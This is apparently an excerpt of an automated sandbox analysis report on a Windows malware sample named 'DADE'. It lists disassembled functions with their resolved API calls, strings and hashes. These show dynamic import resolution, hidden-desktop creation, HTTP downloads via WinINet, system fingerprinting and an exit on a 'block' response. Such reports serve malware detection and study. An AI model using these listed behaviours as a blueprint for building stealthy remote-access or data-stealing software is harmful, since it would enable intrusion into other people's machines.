LoadLibraryA.KERNEL32(00A7DD38), ref: 00426B7B
LoadLibraryA.KERNEL32(00A7DEA0), ref: 00426B8D
LoadLibraryA.KERNEL32(00A7DD68), ref: 00426B9F
LoadLibraryA.KERNEL32(00A7DDC8), ref: 00426BB0
GetProcAddress.KERNEL32(77040000,00A56178), ref: 00426BCC
GetProcAddress.KERNEL32(77040000,00A7DC00), ref: 00426BE4
GetProcAddress.KERNEL32(77040000,00A769F0), ref: 00426BFD
GetProcAddress.KERNEL32(77040000,00A7DDE0), ref: 00426C15
GetProcAddress.KERNEL32(77040000,00A55D38), ref: 00426C2D
GetProcAddress.KERNEL32(704D0000,00A78D10), ref: 00426C4D
GetProcAddress.KERNEL32(704D0000,00A55B98), ref: 00426C65
GetProcAddress.KERNEL32(704D0000,00A78E50), ref: 00426C7E
GetProcAddress.KERNEL32(704D0000,00A7DC60), ref: 00426C96
GetProcAddress.KERNEL32(704D0000,00A7DEB8), ref: 00426CAE
GetProcAddress.KERNEL32(704D0000,00A55C58), ref: 00426CC7
GetProcAddress.KERNEL32(704D0000,00A55E58), ref: 00426CDF
GetProcAddress.KERNEL32(704D0000,00A7DED0), ref: 00426CF7
GetProcAddress.KERNEL32(768D0000,00A55B18), ref: 00426D13
GetProcAddress.KERNEL32(768D0000,00A55DF8), ref: 00426D2B
GetProcAddress.KERNEL32(768D0000,00A7DC18), ref: 00426D44
GetProcAddress.KERNEL32(768D0000,00A7DF18), ref: 00426D5C
GetProcAddress.KERNEL32(768D0000,00A55E18), ref: 00426D74
GetProcAddress.KERNEL32(75790000,00A78EA0), ref: 00426D94
GetProcAddress.KERNEL32(75790000,00A78DD8), ref: 00426DAC
GetProcAddress.KERNEL32(75790000,00A7DF90), ref: 00426DC5
GetProcAddress.KERNEL32(75790000,00A55C18), ref: 00426DDD
GetProcAddress.KERNEL32(75790000,00A55D58), ref: 00426DF5
GetProcAddress.KERNEL32(75790000,00A78EC8), ref: 00426E0E
GetProcAddress.KERNEL32(75A10000,00A7DF30), ref: 00426E2E
GetProcAddress.KERNEL32(75A10000,00A55E78), ref: 00426E46
GetProcAddress.KERNEL32(75A10000,00A76A00), ref: 00426E5F
GetProcAddress.KERNEL32(75A10000,00A7DF48), ref: 00426E77
GetProcAddress.KERNEL32(75A10000,00A7DEE8), ref: 00426E8F
GetProcAddress.KERNEL32(75A10000,00A55BF8), ref: 00426EA8
GetProcAddress.KERNEL32(75A10000,00A55AF8), ref: 00426EC0
GetProcAddress.KERNEL32(75A10000,00A7DFA8), ref: 00426ED8
GetProcAddress.KERNEL32(75A10000,00A7DF00), ref: 00426EF1
GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00426F07
GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00426F1E
GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00426F35
GetProcAddress.KERNEL32(76850000,00A55B38), ref: 00426F51
GetProcAddress.KERNEL32(76850000,00A7DF60), ref: 00426F69
GetProcAddress.KERNEL32(76850000,00A7DF78), ref: 00426F82
GetProcAddress.KERNEL32(76850000,00A7E068), ref: 00426F9A
GetProcAddress.KERNEL32(76850000,00A7E1A0), ref: 00426FB2
GetProcAddress.KERNEL32(75690000,00A55D18), ref: 00426FCE
GetProcAddress.KERNEL32(75690000,00A55D78), ref: 00426FE6
GetProcAddress.KERNEL32(769C0000,00A55D98), ref: 00427002
GetProcAddress.KERNEL32(769C0000,00A7E260), ref: 0042701A
GetProcAddress.KERNEL32(6F8C0000,00A55E38), ref: 0042703A
GetProcAddress.KERNEL32(6F8C0000,00A55EB8), ref: 00427052
GetProcAddress.KERNEL32(6F8C0000,00A55CB8), ref: 0042706B
GetProcAddress.KERNEL32(6F8C0000,00A7E038), ref: 00427083
GetProcAddress.KERNEL32(6F8C0000,00A55E98), ref: 0042709B
GetProcAddress.KERNEL32(6F8C0000,00A55ED8), ref: 004270B4
GetProcAddress.KERNEL32(6F8C0000,00A55DD8), ref: 004270CC
GetProcAddress.KERNEL32(6F8C0000,00A55C38), ref: 004270E4
GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 004270FB
GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00427112
GetProcAddress.KERNEL32(75D90000,00A7E050), ref: 0042712E
GetProcAddress.KERNEL32(75D90000,00A76A10), ref: 00427146
GetProcAddress.KERNEL32(75D90000,00A7E248), ref: 0042715F
GetProcAddress.KERNEL32(75D90000,00A7E218), ref: 00427177
GetProcAddress.KERNEL32(76470000,00A55B58), ref: 00427193
GetProcAddress.KERNEL32(6CD20000,00A7E2C0), ref: 004271AF
GetProcAddress.KERNEL32(6CD20000,00A55C78), ref: 004271C7
GetProcAddress.KERNEL32(6CD20000,00A7E1B8), ref: 004271E0
GetProcAddress.KERNEL32(6CD20000,00A7E140), ref: 004271F8

Strings

HttpQueryInfoA, xrefs: 00427107
CreateDesktopA, xrefs: 00426F01
CloseDesktop, xrefs: 00426F2A
OpenDesktopA, xrefs: 00426F13
InternetSetOptionA, xrefs: 004270F0

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
API String ID: 2238633743-3468015613
Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0

Function 0041F300 Relevance: 104.4, APIs: 57, Strings: 2, Instructions: 1164stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
lstrlenA.KERNEL32(0042D01C), ref: 0041F357
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
lstrlenA.KERNEL32(00A55FB8), ref: 0041F476
lstrcpy.KERNEL32(00000000,?), ref: 0041F506
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
lstrlenA.KERNEL32(00A76970), ref: 0041F8C2
lstrcpy.KERNEL32(00000000,00A76970), ref: 0041F8EF
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
lstrcpy.KERNEL32(00000000,?), ref: 0041F966
lstrcpy.KERNEL32(00000000,00A76970), ref: 0041FA28
lstrcpy.KERNEL32(00000000,00A76980), ref: 0041FA58
lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
lstrlenA.KERNEL32(00402E3E), ref: 0041FC03
lstrcpy.KERNEL32(00000000,00402E3E), ref: 0041FC30
lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7

Strings

>.@, xrefs: 0041FBFB, 0041FD3A
ERROR, xrefs: 0041F788, 0041F88E, 0041FB30, 0041FBCF, 0041FE70, 0041FF0F

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: >.@$ERROR
API String ID: 367037083-1486603279
Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

Function 004056C0 Relevance: 98.7, APIs: 51, Strings: 5, Instructions: 734
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 004056EF
lstrlenA.KERNEL32(?), ref: 00405742
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828

Strings

", xrefs: 00405BA4, 00405C92, 00405D80
~A, xrefs: 0040576C, 00405FEA, 00405E90
------, xrefs: 00405929, 00405956
------, xrefs: 00405B0B, 00405BFC, 00405CEA
--, xrefs: 0040598F, 004059B7

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ------$"$--$------$~A
API String ID: 367037083-2106860866
Opcode ID: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
Opcode Fuzzy Hash: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

Function 00418D00 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 174
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
ExitProcess.KERNEL32 ref: 00418D27
strtok_s.MSVCRT ref: 00418D39

Strings

block, xrefs: 00418D0B

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69

Function 00406B80 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
StrCmpCA.SHLWAPI(?,00A7FF78), ref: 00406C2D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
HttpOpenRequestA.WININET(00000000,GET,?,00A7F838,00000000,00000000,-00400100,00000000), ref: 00406C90
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
InternetCloseHandle.WININET(00000000), ref: 00406DCE
InternetCloseHandle.WININET(?), ref: 00406DD8
InternetCloseHandle.WININET(00000000), ref: 00406DE2
lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03

Strings

ERROR, xrefs: 00406CF2
GET, xrefs: 00406C8A

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR$GET
API String ID: 3687753495-3591763792
Opcode ID: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
Opcode Fuzzy Hash: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

Function 009D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 009D024D

Strings

kernel32.dll, xrefs: 009D008F, 009D0095
cess, xrefs: 009D018D

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 5c36b97fbd7eb516f5c5aebb53495624ec53899763a9feb03dc5b99fe81f7268
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B9526974A012299FDB64CF58C984BA8BBB1BF49304F1480DAE94DAB351DB30AE85DF14

Function 004226E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00A769B0), ref: 0042271B
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00A769B0), ref: 0042274C
GetProcessHeap.KERNEL32(00000000,00000104,?,00A769B0), ref: 004227AF
HeapAlloc.KERNEL32(00000000,?,00A769B0), ref: 004227B6
wsprintfA.USER32 ref: 004227DB

Strings

C, xrefs: 00422725
:\, xrefs: 00422735

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 1325379522-3309953409
Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

Function 00405570 Relevance: 12.1, APIs: 8, Instructions: 112
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
RtlAllocateHeap.NTDLL(00000000), ref: 00405590
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
InternetCloseHandle.WININET(?), ref: 0040562B
InternetCloseHandle.WININET(00000000), ref: 00405632

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
String ID:
API String ID: 1337183907-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

Function 00421BD0 Relevance: 12.1, APIs: 8, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

